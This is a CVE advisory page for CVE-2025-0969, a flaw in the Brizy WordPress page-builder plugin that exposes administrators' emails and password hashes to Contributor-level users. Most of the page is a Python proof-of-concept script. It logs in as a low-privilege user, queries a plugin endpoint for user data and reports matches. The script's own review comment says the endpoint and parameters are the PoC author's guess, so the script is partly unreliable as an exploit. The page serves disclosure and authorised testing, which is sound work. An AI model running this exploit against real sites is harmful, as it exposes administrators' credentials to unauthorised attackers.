Security Vulnerability Report
CVE-2025-0969 CVSS 6.5 MEDIUM

CVE-2025-0969

Published: 2025-12-13 16:16:45
Last Modified: 2026-04-15 00:35:42

Description

The Brizy – Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.16 via the get_users() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including email addresses and hashed passwords of administrators.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Brizy – Page Builder plugin for WordPress <= 2.7.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
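# CVE-2025-0969 PoC - Brizy Plugin Sensitive Information Exposure
# Author: Security Researcher
# Target: WordPress with Brizy Plugin <= 2.7.16
#
# NOTE(review): the endpoint path and request parameters used below are the
# PoC author's. The advisory only names get_users() in editor/api.php, so a
# negative result from this script does not show that a site is patched --
# confirm the installed plugin version instead.

import requests
import json
import sys
from urllib.parse import urljoin

# requests applies no timeout by default; without one a stalled server
# would hang the check indefinitely.
REQUEST_TIMEOUT = 15  # seconds

# Key-name fragments treated as credential-like when echoing a response.
# Constructed heuristic, not taken from the plugin's response schema.
_SENSITIVE_KEY_HINTS = ('pass', 'email')


def _redact(value):
    """Return a copy of *value* with credential-like fields masked for display."""
    if isinstance(value, dict):
        return {
            key: '<redacted>'
            if any(hint in str(key).lower() for hint in _SENSITIVE_KEY_HINTS)
            else _redact(item)
            for key, item in value.items()
        }
    if isinstance(value, list):
        return [_redact(item) for item in value]
    return value


def exploit_brizy_cve_2025_0969(target_url, username, password):
    """
    Check for CVE-2025-0969: Brizy Page Builder Plugin Information Disclosure.

    Logs in with a Contributor+ account and requests the get_users() data
    through the plugin endpoint, then applies loose heuristics to the reply.

    Args:
        target_url: Base URL of the WordPress site under authorized test.
        username: Login name of the Contributor-level (or higher) account.
        password: Password for that account.

    Returns:
        The parsed JSON or the raw response text when a reply matches the
        heuristics; None on login failure, request error, or no match.
        The return value is unredacted and may hold e-mail addresses and
        password hashes -- handle it as sensitive data.
    """
    session = requests.Session()

    # Step 1: Login to WordPress with contributor account
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }

    print(f'[*] Attempting login to {login_url}')

    try:
        session.post(login_url, data=login_data, allow_redirects=True,
                     timeout=REQUEST_TIMEOUT)
    except requests.exceptions.RequestException as e:
        # A connection error at login is reported the same way as one
        # during the check itself instead of surfacing as a traceback.
        print(f'[-] Request failed: {e}')
        return None

    cookie_dump = str(session.cookies)
    if 'wordpress_logged_in' not in cookie_dump and 'authenticated' not in cookie_dump:
        print('[-] Login failed. Check credentials.')
        return None

    print('[+] Login successful with contributor account')

    # Step 2: Request the get_users() data via the Brizy endpoint
    exploit_url = urljoin(target_url, '/wp-content/plugins/brizy/editor/api.php')

    params = {
        'brizy_api': 'get_users',
        'hash': '',          # May need valid hash depending on plugin config
        '_ajax_nonce': ''    # May need nonce for some configurations
    }

    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json'
    }

    print(f'[*] Exploiting vulnerable endpoint: {exploit_url}')

    try:
        # The same parameters are sent once per HTTP method.
        for method in ('GET', 'POST'):
            if method == 'GET':
                response = session.get(exploit_url, params=params,
                                       headers=headers, timeout=REQUEST_TIMEOUT)
            else:
                response = session.post(exploit_url, data=params,
                                        headers=headers, timeout=REQUEST_TIMEOUT)

            if response.status_code != 200:
                continue

            try:
                data = response.json()
                is_json = isinstance(data, (dict, list, str))
            except ValueError:
                # Body is not JSON; fall back to the plain-text markers.
                data = None
                is_json = False

            if is_json:
                # Heuristic only: a 'data' key is also present in generic
                # JSON error envelopes, so a match needs manual review.
                if 'users' in data or 'data' in data or 'email' in str(data).lower():
                    print('[+] Potential sensitive data found!')
                    # Echo a masked copy so hashes and addresses do not end
                    # up in terminal scrollback or captured logs.
                    print(f'[+] Response: {json.dumps(_redact(data), indent=2)}')
                    return data
            else:
                markers = [m for m in ('user_email', 'wp_users') if m in response.text]
                if markers:
                    print('[+] Sensitive data found in response!')
                    print(f'[+] Matched markers: {", ".join(markers)} '
                          f'(body length {len(response.text)}, content not echoed)')
                    return response.text

        print('[-] No vulnerable response detected. Target may be patched or not vulnerable.')
        return None

    except requests.exceptions.RequestException as e:
        print(f'[-] Request failed: {e}')
        return None


def main():
    """Command-line entry point: run the check and print a findings summary."""
    if len(sys.argv) < 4:
        print('Usage: python cve_2025_0969_poc.py <target_url> <username> <password>')
        print('Example: python cve_2025_0969_poc.py http://example.com contributor password123')
        sys.exit(1)

    # NOTE: a password passed on the command line is visible in shell
    # history and the process list; use a throwaway test account.
    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]

    print('=' * 60)
    print('CVE-2025-0969 - Brizy Page Builder Information Disclosure')
    print('=' * 60)

    result = exploit_brizy_cve_2025_0969(target_url, username, password)

    if result:
        print('\n[!] Response matched the exposure heuristics - verify manually.')
        print('[!] Data exposed by this issue can include:')
        print('    - Admin email addresses')
        print('    - Password hashes (can be cracked offline)')
        print('\n[!] Recommended remediation:')
        print('    1. Update Brizy to a release newer than 2.7.16')
        print('    2. Rotate passwords for administrator accounts')
        print('    3. Review accounts holding Contributor-level access or above')
    else:
        print('\n[-] Exploitation failed or target is not vulnerable')


if __name__ == '__main__':
    main()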

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0969", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:44.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Brizy – Page Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.16 via the get_users() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including email addresses and hashed passwords of administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/brizy/trunk/editor/api.php#L961", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3392844", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/brizy/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5987ef13-15d6-4ecf-894c-f22c8726402b?source=cve", "source": "[email protected]"}]}}